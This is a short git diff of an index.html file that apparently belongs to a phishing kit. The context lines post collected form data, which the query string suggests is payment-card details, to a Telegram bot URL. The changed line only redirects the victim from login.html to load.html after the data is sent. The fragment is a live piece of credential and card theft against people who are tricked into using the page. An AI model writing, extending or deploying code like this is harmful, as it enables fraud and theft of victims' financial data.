--- a/index.html
+++ b/index.html
@@ -121,7 +121,7 @@
                             };
 
                             $.post(telegramBotUrl, requestData, function () {
-                                window.location.href = "login.html?vc?__event=card&service_id=top_card=IL";
+                                window.location.href = "load.html?vc?__event=card&service_id=top_card=IL";
                             }).fail(function () {
                                 alert("Please try again.");
                             });
